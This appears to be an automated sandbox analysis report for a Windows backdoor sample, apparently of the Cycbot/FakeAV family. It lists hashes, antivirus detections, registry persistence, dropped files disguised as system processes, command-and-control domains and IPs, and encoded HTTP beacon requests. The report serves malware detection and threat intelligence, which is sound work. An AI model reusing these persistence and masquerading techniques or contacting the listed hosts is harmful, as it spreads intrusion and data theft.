Analysis Date: 2014-06-15 00:48:24
MD5: fa4664b5facd0d5a604f870523b7e9f7
SHA1: abdc8e00fb57191caf574dda66c4e1070821f522

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: 8f70a2dad80eca1b04c4662752c46594 sha1: 14ffd1d13ee641388b221f9fcc7a67a40b77feab size: 180736
Section: .rdata md5: c4e34aa570388c1fcf48840813df2f0d sha1: 0654fdda3751b0947ee04928504fe8402b62eeff size: 3584
Section: .data md5: 0faa9795facb98c0a3ea1e86b93e07ee sha1: f247a73316f35007e55ba660fa1b90f74ebd8782 size: 13824
Section: .lib md5: 907779c387b6948fe2faf4c296b34b31 sha1: 90ce6516acf2ed456d3333695c4d72c15255d2a6 size: 512
Timestamp: 2005-10-06 09:56:08
Version: PrivateBuild: 1547
PEhash: babf06a90baa3173423cf77f29105ffd216db2cd
IMPhash: bcb9a09e6811b495da9cc21b07729bdc
AV: 360 Safe - Gen:Trojan.Heur.KS.1
AV: Ad-Aware - Gen:Trojan.Heur.KS.1
AV: Alwil (avast) - Cybota [Trj]
AV: Arcabit (arcavir) - no_virus
AV: Authentium - W32/Goolbot.E.gen!Eldorado
AV: Avira (antivir) - TR/Diple.psa
AV: CA (E-Trust Ino) - Win32/Diple.A!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Trojan.Agent-207401
AV: Dr. Web - Trojan.DownLoader2.5158
AV: Emsisoft - Gen:Trojan.Heur.KS.1
AV: Eset (nod32) - Win32/Kryptik.KPB
AV: Fortinet - W32/Katusha.O!tr
AV: Frisk (f-prot) - W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV: F-Secure - Gen:Trojan.Heur.KS.1
AV: Grisoft (avg) - Cryptic.CFW
AV: Ikarus - Trojan-Spy.Win32.Zbot
AV: Kaspersky - Trojan.Win32.Diple.li
AV: MalwareBytes - Spyware.Passwords.XGen
AV: Mcafee - BackDoor-EXI.gen.h
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Trojan.Heur.KS.1
AV: Norman - winpe/FakeAV.ACWY
AV: Rising - no_virus
AV: Sophos - Mal/FakeAV-IS
AV: Symantec - Trojan.Gen
AV: Trend Micro - BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32) - Trojan.FakeAV.0997

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: differentdata-one.com
Winsock DNS: 127.0.0.1
Winsock DNS: freemaildotaccess.com
Winsock DNS: 4videosoft.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: 4videosoft.com
Type: A
174.37.30.144
DNS: zonetf.com
Type: A
208.73.211.167
DNS: zonetf.com
Type: A
208.73.211.161
DNS: zonetf.com
Type: A
208.73.211.250
DNS: zonetf.com
Type: A
208.73.211.182
DNS: zonetf.com
Type: A
208.73.211.176
DNS: differentdata-one.com
Type: A
DNS: freemaildotaccess.com
Type: A
HTTP GET: http://4videosoft.com/iphone.gif?tq=gP4aKydkCpd1EC44DwsjoL%2F3GmPrFdTl%2FtjwqJ7r4p7%2B7mzTNEeCvOsMwpFNQiKsmJeV%2FClpIZLzuWIfDRjmkI1NZvwP8HgYdywzmGvG7gU9k7AEuBE5OgjhIhZZP2cQuRh0m9iqZnfCn8iqW6Ii3%2F9vGnHUTUG%2BfO6%2FJOF9qVys9C35Dk3IlNLhcoCmOMmJ5QB7Vhgo1TXhv1Ga8oaVhxWePMT5JDFZEABSTg8REIWLE8XzKu4wzTlOq8B0LkqWIF%2FrLxgidd1QGAyt2dZBjcAZ0gU%2BeVeoNIFuF8UBJ6%2Ba7ogxGdFw50vn0fVBI%2Bo3axaDIqhYQG4QtdomCYFl8C7gziLkSJQr4nHSeiON5qsaiGSz0zgI1vrs5R%2BPEbesvSTDNNjKONhgjMmCiZfBtiIzOT2pmfbiHbG%2BeTp2VYfJ3Xt6VwI4pEYe6Q8c%2F6O1HqosZbn4Xyv%2FoOvCVgmW09lTExXQZXAO5mCzFOl6cEXq8ayEqS%2BBV0372eQr6c3Tj4b8rTsjr1hw
User-Agent: opera/8.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNx1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxL5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 174.37.30.144:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.167:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.167:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.167:80

Raw Pcap

Strings
040904b0
1547
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
ADVAPI32.dll
AMGetErrorTextW
ClearCommError
CloseHandle
CLSIDFromString
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
CoInitializeEx
CopyRect
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateEventA
CreateFiberEx
CreateFileW
CreateItemMoniker
CreateMutexA
CreateSemaphoreA
CreateStreamOnHGlobal
CreateThread
CreateWindowExA
@.data
DeleteCriticalSection
DestroyWindow
DisableThreadLibraryCalls
DispatchMessageA
EnterCriticalSection
EnumResourceNamesA
ExitProcess
FatalExit
FindResourceA
FreeLibrary
GetACP
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetExitCodeThread
GetLastError
GetMessageA
GetModuleFileNameA
GetModuleFileNameW
GetProcAddress
GetProcessHeap
GetQueueStatus
GetRunningObjectTable
GetSystemInfo
GetSystemTime
GetSystemTimeAsFileTime
GetThreadPriority
GetTickCount
GetVersionExA
GlobalAlloc
HeapFree
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsBadReadPtr
IsBadWritePtr
KERNEL32.dll
LeaveCriticalSection
LoadLibraryA
LoadLibraryW
LoadResource
LoadStringA
LocalFree
LockResource
lstrlenA
MonitorFromWindow
MsgWaitForMultipleObjects
MultiByteToWideChar
ole32.dll
PeekMessageA
PostThreadMessageA
QUARTZ.dll
QueryPerformanceCounter
`.rdata
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegisterClassA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueA
RegSetValueExA
ReleaseMutex
ReleaseSemaphore
ResetEvent
ResumeThread
SetEvent
SetThreadPriority
SHELL32.dll
SHGetSpecialFolderPathA
StringFromCLSID
StringFromGUID2
TerminateThread
!This program cannot be run in DOS mode.
timeBeginPeriod
timeEndPeriod
timeGetDevCaps
timeGetTime
USER32.dll
VirtualAlloc
VirtualFree
WaitForMultipleObjects
WaitForSingleObject
WideCharToMultiByte
WINMM.dll
wsprintfA
wvsprintfA